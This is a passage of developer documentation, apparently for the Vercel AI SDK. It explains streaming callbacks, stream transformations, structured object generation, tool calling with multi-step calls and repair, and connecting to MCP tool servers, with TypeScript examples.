You can use streamText on its own or in combination with AI SDK UI and AI SDK RSC. The result object contains several helper functions to make the integration into AI SDK UI easier:

result.toDataStreamResponse(): Creates a data stream HTTP response (with tool calls etc.) that can be used in a Next.js App Router API route.
result.pipeDataStreamToResponse(): Writes data stream delta output to a Node.js response-like object.
result.toTextStreamResponse(): Creates a simple text stream HTTP response.
result.pipeTextStreamToResponse(): Writes text delta output to a Node.js response-like object.

It also provides several promises that resolve when the stream is finished:

result.text: The generated text.
result.reasoning: The reasoning text of the model (only available for some models).
result.sources: Sources that have been used as input to generate the response (only available for some models).
result.finishReason: The reason the model finished generating text.
result.usage: The usage of the model during text generation.

`onError` callback

streamText immediately starts streaming to enable sending data without waiting for the model. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamText } from 'ai';

const result = streamText({
  model: yourModel,
  prompt: 'Invent a new holiday and describe its traditions.',
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

`onChunk` callback

When using streamText, you can provide an onChunk callback that is triggered for each chunk of the stream.

It receives the following chunk types:

text-delta
reasoning
source
tool-call
tool-result
tool-call-streaming-start (when toolCallStreaming is enabled)
tool-call-delta (when toolCallStreaming is enabled)

import { streamText } from 'ai';

const result = streamText({
  model: yourModel,
  prompt: 'Invent a new holiday and describe its traditions.',
  onChunk({ chunk }) {
    // implement your own logic here, e.g.:
    if (chunk.type === 'text-delta') {
      console.log(chunk.text);
    }
  },
});

`onFinish` callback

When using streamText, you can provide an onFinish callback that is triggered when the stream is finished ( API Reference ). It contains the text, usage information, finish reason, messages, and more:

import { streamText } from 'ai';

const result = streamText({
  model: yourModel,
  prompt: 'Invent a new holiday and describe its traditions.',
  onFinish({ text, finishReason, usage, response }) {
    // your own logic, e.g. for saving the chat history or recording usage

    const messages = response.messages; // messages that were generated
  },
});

`fullStream` property

You can read a stream with all events using the fullStream property. This can be useful if you want to implement your own UI or handle the stream in a different way. Here is an example of how to use the fullStream property:

import { streamText } from 'ai';
import { z } from 'zod';

const result = streamText({
  model: yourModel,
  tools: {
    cityAttractions: {
      parameters: z.object({ city: z.string() }),
      execute: async ({ city }) => ({
        attractions: ['attraction1', 'attraction2', 'attraction3'],
      }),
    },
  },
  prompt: 'What are some San Francisco tourist attractions?',
});

for await (const part of result.fullStream) {
  switch (part.type) {
    case 'text-delta': {
      // handle text delta here
      break;
    }
    case 'reasoning': {
      // handle reasoning here
      break;
    }
    case 'source': {
      // handle source here
      break;
    }
    case 'tool-call': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool call here
          break;
        }
      }
      break;
    }
    case 'tool-result': {
      switch (part.toolName) {
        case 'cityAttractions': {
          // handle tool result here
          break;
        }
      }
      break;
    }
    case 'finish': {
      // handle finish here
      break;
    }
    case 'error': {
      // handle error here
      break;
    }
  }
}

Stream transformation

You can use the experimental_transform option to transform the stream. This is useful for e.g. filtering, changing, or smoothing the text stream.

The transformations are applied before the callbacks are invoked and the promises are resolved. If you e.g. have a transformation that changes all text to uppercase, the onFinish callback will receive the transformed text.

Smoothing streams

The AI SDK Core provides a smoothStream function that can be used to smooth out text streaming.

import { smoothStream, streamText } from 'ai';

const result = streamText({
  model,
  prompt,
  experimental_transform: smoothStream(),
});

Custom transformations

You can also implement your own custom transformations. The transformation function receives the tools that are available to the model, and returns a function that is used to transform the stream. Tools can either be generic or limited to the tools that you are using.

Here is an example of how to implement a custom transformation that converts all text to uppercase:

const upperCaseTransform =
  <TOOLS extends ToolSet>() =>
  (options: { tools: TOOLS; stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      transform(chunk, controller) {
        controller.enqueue(
          // for text-delta chunks, convert the text to uppercase:
          chunk.type === 'text-delta'
            ? { ...chunk, textDelta: chunk.textDelta.toUpperCase() }
            : chunk,
        );
      },
    });

You can also stop the stream using the stopStream function. This is e.g. useful if you want to stop the stream when model guardrails are violated, e.g. by generating inappropriate content.

When you invoke stopStream, it is important to simulate the step-finish and finish events to guarantee that a well-formed stream is returned and all callbacks are invoked.

const stopWordTransform =
  <TOOLS extends ToolSet>() =>
  ({ stopStream }: { stopStream: () => void }) =>
    new TransformStream<TextStreamPart<TOOLS>, TextStreamPart<TOOLS>>({
      // note: this is a simplified transformation for testing;
      // in a real-world version more there would need to be
      // stream buffering and scanning to correctly emit prior text
      // and to detect all STOP occurrences.
      transform(chunk, controller) {
        if (chunk.type !== 'text-delta') {
          controller.enqueue(chunk);
          return;
        }

        if (chunk.textDelta.includes('STOP')) {
          // stop the stream
          stopStream();

          // simulate the step-finish event
          controller.enqueue({
            type: 'step-finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            request: {},
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
            warnings: [],
            isContinued: false,
          });

          // simulate the finish event
          controller.enqueue({
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: {
              completionTokens: NaN,
              promptTokens: NaN,
              totalTokens: NaN,
            },
            response: {
              id: 'response-id',
              modelId: 'mock-model-id',
              timestamp: new Date(0),
            },
          });

          return;
        }

        controller.enqueue(chunk);
      },
    });

Multiple transformations

You can also provide multiple transformations. They are applied in the order they are provided.

const result = streamText({
  model,
  prompt,
  experimental_transform: [firstTransform, secondTransform],
});

Sources

Some providers such as Perplexity and Google Generative AI include sources in the response.

Currently sources are limited to web pages that ground the response. You can access them using the sources property of the result.

Each url source contains the following properties:

id: The ID of the source.
url: The URL of the source.
title: The optional title of the source.
providerMetadata: Provider metadata for the source.

When you use generateText, you can access the sources using the sources property:

const result = await generateText({
  model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for (const source of result.sources) {
  if (source.sourceType === 'url') {
    console.log('ID:', source.id);
    console.log('Title:', source.title);
    console.log('URL:', source.url);
    console.log('Provider metadata:', source.providerMetadata);
    console.log();
  }
}

When you use streamText, you can access the sources using the fullStream property:

const result = streamText({
  model: google('gemini-2.0-flash-exp', { useSearchGrounding: true }),
  prompt: 'List the top 5 San Francisco news from the past week.',
});

for await (const part of result.fullStream) {
  if (part.type === 'source' && part.source.sourceType === 'url') {
    console.log('ID:', part.source.id);
    console.log('Title:', part.source.title);
    console.log('URL:', part.source.url);
    console.log('Provider metadata:', part.source.providerMetadata);
    console.log();
  }
}

The sources are also available in the result.sources promise.

Generating Long Text

Most language models have an output limit that is much shorter than their context window. This means that you cannot generate long text in one go, but it is possible to add responses back to the input and continue generating to create longer text.

generateText and streamText support such continuations for long text generation using the experimental continueSteps setting:

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const {
  text, // combined text
  usage, // combined usage of all steps
} = await generateText({
  model: openai('gpt-4o'), // 4096 output tokens
  maxSteps: 5, // enable multi-step calls
  experimental_continueSteps: true,
  prompt:
    'Write a book about Roman history, ' +
    'from the founding of the city of Rome ' +
    'to the fall of the Western Roman Empire. ' +
    'Each chapter MUST HAVE at least 1000 words.',
});

Examples

You can see generateText and streamText in action using various frameworks in the following examples:

`generateText`

`streamText`

title: Generating Structured Data description: Learn how to generate structured data with the AI SDK.

Generating Structured Data

While text generation can be useful, your use case will likely call for generating structured data. For example, you might want to extract information from text, classify data, or generate synthetic data.

Many language models are capable of generating structured data, often defined as using "JSON modes" or "tools". However, you need to manually provide schemas and then validate the generated data as LLMs can produce incorrect or incomplete structured data.

The AI SDK standardises structured object generation across model providers with the generateObject and streamObject functions. You can use both functions with different output strategies, e.g. array, object, or no-schema, and with different generation modes, e.g. auto, tool, or json. You can use Zod schemas, Valibot, or JSON schemas to specify the shape of the data that you want, and the AI model will generate data that conforms to that structure.

Generate Object

The generateObject generates structured data from a prompt. The schema is also used to validate the generated data, ensuring type safety and correctness.

import { generateObject } from 'ai';
import { z } from 'zod';

const { object } = await generateObject({
  model: yourModel,
  schema: z.object({
    recipe: z.object({
      name: z.string(),
      ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
      steps: z.array(z.string()),
    }),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Accessing response headers & body

Sometimes you need access to the full response from the model provider, e.g. to access some provider-specific headers or body content.

You can access the raw response headers and body using the response property:

import { generateText } from 'ai';

const result = await generateText({
  // ...
});

console.log(JSON.stringify(result.response.headers, null, 2));
console.log(JSON.stringify(result.response.body, null, 2));

Stream Object

Given the added complexity of returning structured data, model response time can be unacceptable for your interactive use case. With the streamObject function, you can stream the model's response as it is generated.

import { streamObject } from 'ai';

const { partialObjectStream } = streamObject({
  // ...
});

// use partialObjectStream as an async iterable
for await (const partialObject of partialObjectStream) {
  console.log(partialObject);
}

You can use streamObject to stream generated UIs in combination with React Server Components (see Generative UI)) or the useObject hook.

See streamObject in action with these examples

`onError` callback

streamObject immediately starts streaming. Errors become part of the stream and are not thrown to prevent e.g. servers from crashing.

To log errors, you can provide an onError callback that is triggered when an error occurs.

import { streamObject } from 'ai';

const result = streamObject({
  // ...
  onError({ error }) {
    console.error(error); // your error logging logic here
  },
});

Output Strategy

You can use both functions with different output strategies, e.g. array, object, or no-schema.

Object

The default output strategy is object, which returns the generated data as an object. You don't need to specify the output strategy if you want to use the default.

Array

If you want to generate an array of objects, you can set the output strategy to array. When you use the array output strategy, the schema specifies the shape of an array element. With streamObject, you can also stream the generated array elements using elementStream.

import { openai } from '@ai-sdk/openai';
import { streamObject } from 'ai';
import { z } from 'zod';

const { elementStream } = streamObject({
  model: openai('gpt-4-turbo'),
  output: 'array',
  schema: z.object({
    name: z.string(),
    class: z
      .string()
      .describe('Character class, e.g. warrior, mage, or thief.'),
    description: z.string(),
  }),
  prompt: 'Generate 3 hero descriptions for a fantasy role playing game.',
});

for await (const hero of elementStream) {
  console.log(hero);
}

Enum

If you want to generate a specific enum value, e.g. for classification tasks, you can set the output strategy to enum and provide a list of possible values in the enum parameter.

Enum output is only available with generateObject.

import { generateObject } from 'ai';

const { object } = await generateObject({
  model: yourModel,
  output: 'enum',
  enum: ['action', 'comedy', 'drama', 'horror', 'sci-fi'],
  prompt:
    'Classify the genre of this movie plot: ' +
    '"A group of astronauts travel through a wormhole in search of a ' +
    'new habitable planet for humanity."',
});

No Schema

In some cases, you might not want to use a schema, for example when the data is a dynamic user request. You can use the output setting to set the output format to no-schema in those cases and omit the schema parameter.

import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';

const { object } = await generateObject({
  model: openai('gpt-4-turbo'),
  output: 'no-schema',
  prompt: 'Generate a lasagna recipe.',
});

Generation Mode

While some models (like OpenAI) natively support object generation, others require alternative methods, like modified tool calling. The generateObject function allows you to specify the method it will use to return structured data.

auto: The provider will choose the best mode for the model. This recommended mode is used by default.
tool: A tool with the JSON schema as parameters is provided and the provider is instructed to use it.
json: The response format is set to JSON when supported by the provider, e.g. via json modes or grammar-guided generation. If grammar-guided generation is not supported, the JSON schema and instructions to generate JSON that conforms to the schema are injected into the system prompt.

Schema Name and Description

You can optionally specify a name and description for the schema. These are used by some providers for additional LLM guidance, e.g. via tool or schema name.

import { generateObject } from 'ai';
import { z } from 'zod';

const { object } = await generateObject({
  model: yourModel,
  schemaName: 'Recipe',
  schemaDescription: 'A recipe for a dish.',
  schema: z.object({
    name: z.string(),
    ingredients: z.array(z.object({ name: z.string(), amount: z.string() })),
    steps: z.array(z.string()),
  }),
  prompt: 'Generate a lasagna recipe.',
});

Error Handling

When generateObject cannot generate a valid object, it throws a AI_NoObjectGeneratedError.

This error occurs when the AI provider fails to generate a parsable object that conforms to the schema. It can arise due to the following reasons:

The model failed to generate a response.
The model generated a response that could not be parsed.
The model generated a response that could not be validated against the schema.

The error preserves the following information to help you log the issue:

text: The text that was generated by the model. This can be the raw text or the tool call text, depending on the object generation mode.
response: Metadata about the language model response, including response id, timestamp, and model.
usage: Request token usage.
cause: The cause of the error (e.g. a JSON parsing error). You can use this for more detailed error handling.

import { generateObject, NoObjectGeneratedError } from 'ai';

try {
  await generateObject({ model, schema, prompt });
} catch (error) {
  if (NoObjectGeneratedError.isInstance(error)) {
    console.log('NoObjectGeneratedError');
    console.log('Cause:', error.cause);
    console.log('Text:', error.text);
    console.log('Response:', error.response);
    console.log('Usage:', error.usage);
  }
}

Repairing Invalid or Malformed JSON

Sometimes the model will generate invalid or malformed JSON. You can use the repairText function to attempt to repair the JSON.

It receives the error, either a JSONParseError or a TypeValidationError, and the text that was generated by the model. You can then attempt to repair the text and return the repaired text.

import { generateObject } from 'ai';

const { object } = await generateObject({
  model,
  schema,
  prompt,
  experimental_repairText: async ({ text, error }) => {
    // example: add a closing brace to the text
    return text + '}';
  },
});

Structured outputs with `generateText` and `streamText`

You can generate structured data with generateText and streamText by using the experimental_output setting.

`generateText`

// experimental_output is a structured object that matches the schema:
const { experimental_output } = await generateText({
  // ...
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable().describe('Age of the person.'),
      contact: z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      occupation: z.object({
        type: z.literal('employed'),
        company: z.string(),
        position: z.string(),
      }),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

`streamText`

// experimental_partialOutputStream contains generated partial objects:
const { experimental_partialOutputStream } = await streamText({
  // ...
  experimental_output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number().nullable().describe('Age of the person.'),
      contact: z.object({
        type: z.literal('email'),
        value: z.string(),
      }),
      occupation: z.object({
        type: z.literal('employed'),
        company: z.string(),
        position: z.string(),
      }),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

More Examples

You can see generateObject and streamObject in action using various frameworks in the following examples:

`generateObject`

`streamObject`

title: Tool Calling description: Learn about tool calling and multi-step calls (using maxSteps) with AI SDK Core.

Tool Calling

As covered under Foundations, tools are objects that can be called by the model to perform a specific task. AI SDK Core tools contain three elements:

description: An optional description of the tool that can influence when the tool is picked.
parameters: A Zod schema or a JSON schema that defines the parameters. The schema is consumed by the LLM, and also used to validate the LLM tool calls.
execute: An optional async function that is called with the arguments from the tool call. It produces a value of type RESULT (generic type). It is optional because you might want to forward tool calls to the client or to a queue instead of executing them in the same process.

The tools parameter of generateText and streamText is an object that has the tool names as keys and the tools as values:

import { z } from 'zod';
import { generateText, tool } from 'ai';

const result = await generateText({
  model: yourModel,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Tool calling is not restricted to only text generation. You can also use it to render user interfaces (Generative UI).

Multi-Step Calls (using maxSteps)

With the maxSteps setting, you can enable multi-step calls in generateText and streamText. When maxSteps is set to a number greater than 1 and the model generates a tool call, the AI SDK will trigger a new generation passing in the tool result until there are no further tool calls or the maximum number of tool steps is reached.

By default, when you use generateText or streamText, it triggers a single generation (maxSteps: 1). This works well for many use cases where you can rely on the model's training data to generate a response. However, when you provide tools, the model now has the choice to either generate a normal text response, or generate a tool call. If the model generates a tool call, it's generation is complete and that step is finished.

You may want the model to generate text after the tool has been executed, either to summarize the tool results in the context of the users query. In many cases, you may also want the model to use multiple tools in a single response. This is where multi-step calls come in.

You can think of multi-step calls in a similar way to a conversation with a human. When you ask a question, if the person does not have the requisite knowledge in their common knowledge (a model's training data), the person may need to look up information (use a tool) before they can provide you with an answer. In the same way, the model may need to call a tool to get the information it needs to answer your question where each generation (tool call or text generation) is a step.

Example

In the following example, there are two steps:

Step 1
1. The prompt 'What is the weather in San Francisco?' is sent to the model.
2. The model generates a tool call.
3. The tool call is executed.
Step 2
1. The tool result is sent to the model.
2. The model generates a response considering the tool result.

import { z } from 'zod';
import { generateText, tool } from 'ai';

const { text, steps } = await generateText({
  model: yourModel,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  maxSteps: 5, // allow up to 5 steps
  prompt: 'What is the weather in San Francisco?',
});

You can use streamText in a similar way.

Steps

To access intermediate tool calls and results, you can use the steps property in the result object or the streamText onFinish callback. It contains all the text, tool calls, tool results, and more from each step.

Example: Extract tool results from all steps

import { generateText } from 'ai';

const { steps } = await generateText({
  model: openai('gpt-4-turbo'),
  maxSteps: 10,
  // ...
});

// extract all tool calls from the steps:
const allToolCalls = steps.flatMap(step => step.toolCalls);

`onStepFinish` callback

When using generateText or streamText, you can provide an onStepFinish callback that is triggered when a step is finished, i.e. all text deltas, tool calls, and tool results for the step are available. When you have multiple steps, the callback is triggered for each step.

import { generateText } from 'ai';

const result = await generateText({
  // ...
  onStepFinish({ text, toolCalls, toolResults, finishReason, usage }) {
    // your own logic, e.g. for saving the chat history or recording usage
  },
});

`experimental_prepareStep` callback

The experimental_prepareStep callback is called before a step is started.

It is called with the following parameters:

model: The model that was passed into generateText.
maxSteps: The maximum number of steps that was passed into generateText.
stepNumber: The number of the step that is being executed.
steps: The steps that have been executed so far.

You can use it to provide different settings for a step.

import { generateText } from 'ai';

const result = await generateText({
  // ...
  experimental_prepareStep: async ({ model, stepNumber, maxSteps, steps }) => {
    if (stepNumber === 0) {
      return {
        // use a different model for this step:
        model: modelForThisParticularStep,
        // force a tool choice for this step:
        toolChoice: { type: 'tool', toolName: 'tool1' },
        // limit the tools that are available for this step:
        experimental_activeTools: ['tool1'],
      };
    }

    // when nothing is returned, the default settings are used
  },
});

Response Messages

Adding the generated assistant and tool messages to your conversation history is a common task, especially if you are using multi-step tool calls.

Both generateText and streamText have a response.messages property that you can use to add the assistant and tool messages to your conversation history. It is also available in the onFinish callback of streamText.

The response.messages property contains an array of CoreMessage objects that you can add to your conversation history:

import { generateText } from 'ai';

const messages: CoreMessage[] = [
  // ...
];

const { response } = await generateText({
  // ...
  messages,
});

// add the response messages to your conversation history:
messages.push(...response.messages); // streamText: ...((await response).messages)

Tool Choice

You can use the toolChoice setting to influence when a tool is selected. It supports the following settings:

auto (default): the model can choose whether and which tools to call.
required: the model must call a tool. It can choose which tool to call.
none: the model must not call tools
{ type: 'tool', toolName: string (typed) }: the model must call the specified tool

import { z } from 'zod';
import { generateText, tool } from 'ai';

const result = await generateText({
  model: yourModel,
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({
        location: z.string().describe('The location to get the weather for'),
      }),
      execute: async ({ location }) => ({
        location,
        temperature: 72 + Math.floor(Math.random() * 21) - 10,
      }),
    }),
  },
  toolChoice: 'required', // force the model to call a tool
  prompt: 'What is the weather in San Francisco?',
});

Tool Execution Options

When tools are called, they receive additional options as a second parameter.

Tool Call ID

The ID of the tool call is forwarded to the tool execution. You can use it e.g. when sending tool-call related information with stream data.

import { StreamData, streamText, tool } from 'ai';

export async function POST(req: Request) {
  const { messages } = await req.json();

  const data = new StreamData();

  const result = streamText({
    // ...
    messages,
    tools: {
      myTool: tool({
        // ...
        execute: async (args, { toolCallId }) => {
          // return e.g. custom status for tool call
          data.appendMessageAnnotation({
            type: 'tool-status',
            toolCallId,
            status: 'in-progress',
          });
          // ...
        },
      }),
    },
    onFinish() {
      data.close();
    },
  });

  return result.toDataStreamResponse({ data });
}

Messages

The messages that were sent to the language model to initiate the response that contained the tool call are forwarded to the tool execution. You can access them in the second parameter of the execute function. In multi-step calls, the messages contain the text, tool calls, and tool results from all previous steps.

import { generateText, tool } from 'ai';

const result = await generateText({
  // ...
  tools: {
    myTool: tool({
      // ...
      execute: async (args, { messages }) => {
        // use the message history in e.g. calls to other language models
        return something;
      },
    }),
  },
});

Abort Signals

The abort signals from generateText and streamText are forwarded to the tool execution. You can access them in the second parameter of the execute function and e.g. abort long-running computations or forward them to fetch calls inside tools.

import { z } from 'zod';
import { generateText, tool } from 'ai';

const result = await generateText({
  model: yourModel,
  abortSignal: myAbortSignal, // signal that will be forwarded to tools
  tools: {
    weather: tool({
      description: 'Get the weather in a location',
      parameters: z.object({ location: z.string() }),
      execute: async ({ location }, { abortSignal }) => {
        return fetch(
          `https://api.weatherapi.com/v1/current.json?q=${location}`,
          { signal: abortSignal }, // forward the abort signal to fetch
        );
      },
    }),
  },
  prompt: 'What is the weather in San Francisco?',
});

Types

Modularizing your code often requires defining types to ensure type safety and reusability. To enable this, the AI SDK provides several helper types for tools, tool calls, and tool results.

You can use them to strongly type your variables, function parameters, and return types in parts of the code that are not directly related to streamText or generateText.

Each tool call is typed with ToolCall<NAME extends string, ARGS>, depending on the tool that has been invoked. Similarly, the tool results are typed with ToolResult<NAME extends string, ARGS, RESULT>.

The tools in streamText and generateText are defined as a ToolSet. The type inference helpers ToolCallUnion<TOOLS extends ToolSet> and ToolResultUnion<TOOLS extends ToolSet> can be used to extract the tool call and tool result types from the tools.

import { openai } from '@ai-sdk/openai';
import { ToolCallUnion, ToolResultUnion, generateText, tool } from 'ai';
import { z } from 'zod';

const myToolSet = {
  firstTool: tool({
    description: 'Greets the user',
    parameters: z.object({ name: z.string() }),
    execute: async ({ name }) => `Hello, ${name}!`,
  }),
  secondTool: tool({
    description: 'Tells the user their age',
    parameters: z.object({ age: z.number() }),
    execute: async ({ age }) => `You are ${age} years old!`,
  }),
};

type MyToolCall = ToolCallUnion<typeof myToolSet>;
type MyToolResult = ToolResultUnion<typeof myToolSet>;

async function generateSomething(prompt: string): Promise<{
  text: string;
  toolCalls: Array<MyToolCall>; // typed tool calls
  toolResults: Array<MyToolResult>; // typed tool results
}> {
  return generateText({
    model: openai('gpt-4o'),
    tools: myToolSet,
    prompt,
  });
}

Handling Errors

The AI SDK has three tool-call related errors:

NoSuchToolError: the model tries to call a tool that is not defined in the tools object
InvalidToolArgumentsError: the model calls a tool with arguments that do not match the tool's parameters
ToolExecutionError: an error that occurred during tool execution
ToolCallRepairError: an error that occurred during tool call repair

`generateText`

generateText throws errors and can be handled using a try/catch block:

try {
  const result = await generateText({
    //...
  });
} catch (error) {
  if (NoSuchToolError.isInstance(error)) {
    // handle the no such tool error
  } else if (InvalidToolArgumentsError.isInstance(error)) {
    // handle the invalid tool arguments error
  } else if (ToolExecutionError.isInstance(error)) {
    // handle the tool execution error
  } else {
    // handle other errors
  }
}

`streamText`

streamText sends the errors as part of the full stream. The error parts contain the error object.

When using toDataStreamResponse, you can pass an getErrorMessage function to extract the error message from the error part and forward it as part of the data stream response:

const result = streamText({
  // ...
});

return result.toDataStreamResponse({
  getErrorMessage: error => {
    if (NoSuchToolError.isInstance(error)) {
      return 'The model tried to call a unknown tool.';
    } else if (InvalidToolArgumentsError.isInstance(error)) {
      return 'The model called a tool with invalid arguments.';
    } else if (ToolExecutionError.isInstance(error)) {
      return 'An error occurred during tool execution.';
    } else {
      return 'An unknown error occurred.';
    }
  },
});

Tool Call Repair

Language models sometimes fail to generate valid tool calls, especially when the parameters are complex or the model is smaller.

You can use the experimental_repairToolCall function to attempt to repair the tool call with a custom function.

You can use different strategies to repair the tool call:

Use a model with structured outputs to generate the arguments.
Send the messages, system prompt, and tool schema to a stronger model to generate the arguments.
Provide more specific repair instructions based on which tool was called.

Example: Use a model with structured outputs for repair

import { openai } from '@ai-sdk/openai';
import { generateObject, generateText, NoSuchToolError, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    parameterSchema,
    error,
  }) => {
    if (NoSuchToolError.isInstance(error)) {
      return null; // do not attempt to fix invalid tool names
    }

    const tool = tools[toolCall.toolName as keyof typeof tools];

    const { object: repairedArgs } = await generateObject({
      model: openai('gpt-4o', { structuredOutputs: true }),
      schema: tool.parameters,
      prompt: [
        `The model tried to call the tool "${toolCall.toolName}"` +
          ` with the following arguments:`,
        JSON.stringify(toolCall.args),
        `The tool accepts the following schema:`,
        JSON.stringify(parameterSchema(toolCall)),
        'Please fix the arguments.',
      ].join('\n'),
    });

    return { ...toolCall, args: JSON.stringify(repairedArgs) };
  },
});

Example: Use the re-ask strategy for repair

import { openai } from '@ai-sdk/openai';
import { generateObject, generateText, NoSuchToolError, tool } from 'ai';

const result = await generateText({
  model,
  tools,
  prompt,

  experimental_repairToolCall: async ({
    toolCall,
    tools,
    error,
    messages,
    system,
  }) => {
    const result = await generateText({
      model,
      system,
      messages: [
        ...messages,
        {
          role: 'assistant',
          content: [
            {
              type: 'tool-call',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              args: toolCall.args,
            },
          ],
        },
        {
          role: 'tool' as const,
          content: [
            {
              type: 'tool-result',
              toolCallId: toolCall.toolCallId,
              toolName: toolCall.toolName,
              result: error.message,
            },
          ],
        },
      ],
      tools,
    });

    const newToolCall = result.toolCalls.find(
      newToolCall => newToolCall.toolName === toolCall.toolName,
    );

    return newToolCall != null
      ? {
          toolCallType: 'function' as const,
          toolCallId: toolCall.toolCallId,
          toolName: toolCall.toolName,
          args: JSON.stringify(newToolCall.args),
        }
      : null;
  },
});

Active Tools

Language models can only handle a limited number of tools at a time, depending on the model. To allow for static typing using a large number of tools and limiting the available tools to the model at the same time, the AI SDK provides the experimental_activeTools property.

It is an array of tool names that are currently active. By default, the value is undefined and all tools are active.

import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';

const { text } = await generateText({
  model: openai('gpt-4o'),
  tools: myToolSet,
  experimental_activeTools: ['firstTool'],
});

Multi-modal Tool Results

In order to send multi-modal tool results, e.g. screenshots, back to the model, they need to be converted into a specific format.

AI SDK Core tools have an optional experimental_toToolResultContent function that converts the tool result into a content part.

Here is an example for converting a screenshot into a content part:

const result = await generateText({
  model: anthropic('claude-3-5-sonnet-20241022'),
  tools: {
    computer: anthropic.tools.computer_20241022({
      // ...
      async execute({ action, coordinate, text }) {
        switch (action) {
          case 'screenshot': {
            return {
              type: 'image',
              data: fs
                .readFileSync('./data/screenshot-editor.png')
                .toString('base64'),
            };
          }
          default: {
            return `executed ${action}`;
          }
        }
      },

      // map to tool result content for LLM consumption:
      experimental_toToolResultContent(result) {
        return typeof result === 'string'
          ? [{ type: 'text', text: result }]
          : [{ type: 'image', data: result.data, mimeType: 'image/png' }];
      },
    }),
  },
  // ...
});

Extracting Tools

Once you start having many tools, you might want to extract them into separate files. The tool helper function is crucial for this, because it ensures correct type inference.

Here is an example of an extracted tool:

import { tool } from 'ai';
import { z } from 'zod';

// the `tool` helper function ensures correct type inference:
export const weatherTool = tool({
  description: 'Get the weather in a location',
  parameters: z.object({
    location: z.string().describe('The location to get the weather for'),
  }),
  execute: async ({ location }) => ({
    location,
    temperature: 72 + Math.floor(Math.random() * 21) - 10,
  }),
});

MCP Tools

The AI SDK supports connecting to Model Context Protocol (MCP) servers to access their tools. This enables your AI applications to discover and use tools across various services through a standardized interface.

Initializing an MCP Client

Create an MCP client using either:

SSE (Server-Sent Events): Uses HTTP-based real-time communication, better suited for remote servers that need to send data over the network
stdio: Uses standard input and output streams for communication, ideal for local tool servers running on the same machine (like CLI tools or local services)
Custom transport: Bring your own transport by implementing the MCPTransport interface, ideal when implementing transports from MCP's official Typescript SDK (e.g. StreamableHTTPClientTransport)

SSE Transport

The SSE can be configured using a simple object with a type and url property:

import { experimental_createMCPClient as createMCPClient } from 'ai';

const mcpClient = await createMCPClient({
  transport: {
    type: 'sse',
    url: 'https://my-server.com/sse',

    // optional: configure HTTP headers, e.g. for authentication
    headers: {
      Authorization: 'Bearer my-api-key',
    },
  },
});

Stdio Transport

The Stdio transport requires importing the StdioMCPTransport class from the ai/mcp-stdio package:

import { experimental_createMCPClient as createMCPClient } from 'ai';
import { Experimental_StdioMCPTransport as StdioMCPTransport } from 'ai/mcp-stdio';

const mcpClient = await createMCPClient({
  transport: new StdioMCPTransport({
    command: 'node',
    args: ['src/stdio/dist/server.js'],
  }),
});

Custom Transport

You can also bring your own transport, as long as it implements the MCPTransport interface. Below is an example of using the new StreamableHTTPClientTransport from MCP's official Typescript SDK:

import {
  MCPTransport,
  experimental_createMCPClient as createMCPClient,
} from 'ai';
import { StreamableHTTPClientTransport } from '@modelcontextprotocol/sdk/client/streamableHttp';

const url = new URL('http://localhost:3000/mcp');
const mcpClient = await createMCPClient({
  transport: new StreamableHTTPClientTransport(url, {
    sessionId: 'session_123',
  }),
});

Closing the MCP Client

After initialization, you should close the MCP client based on your usage pattern:

For short-lived usage (e.g., single requests), close the client when the response is finished
For long-running clients (e.g., command line apps), keep the client open but ensure it's closed when the application terminates

When streaming responses, you can close the client when the LLM response has finished. For example, when using streamText, you should use the onFinish callback:

const mcpClient = await experimental_createMCPClient({
  // ...
});

const tools = await mcpClient.tools();

const result = await streamText({
  model: openai('gpt-4o'),
  tools,
  prompt: 'What is the weather in Brooklyn, New York?',
  onFinish: async () => {
    await mcpClient.close();
  },
});

When generating responses without streaming, you can use try/finally or cleanup functions in your framework:

let mcpClient: MCPClient | undefined;

try {
  mcpClient = await experimental_createMCPClient({
    // ...
  });
} finally {
  await mcpClient?.close();
}

Using MCP Tools

The client's tools method acts as an adapter between MCP tools and AI SDK tools. It supports two approaches for working with tool schemas:

Schema Discovery

The simplest approach where all tools offered by the server are listed, and input parameter types are inferred based the schemas provided by the server:

const tools = await mcpClient.tools();

Pros:

Simpler to implement
Automatically stays in sync with server changes

Cons:

No TypeScript type safety during development
No IDE autocompletion for tool parameters
Errors only surface at runtime
Loads all tools from the server

Schema Definition

You can also define the tools and their input schemas explicitly in your client code:

import { z } from 'zod';

const tools = await mcpClient.tools({
  schemas: {
    'get-data': {
      parameters: z.object({
        query: z.string().describe('The data query'),
        format: z.enum(['json', 'text']).optional(),
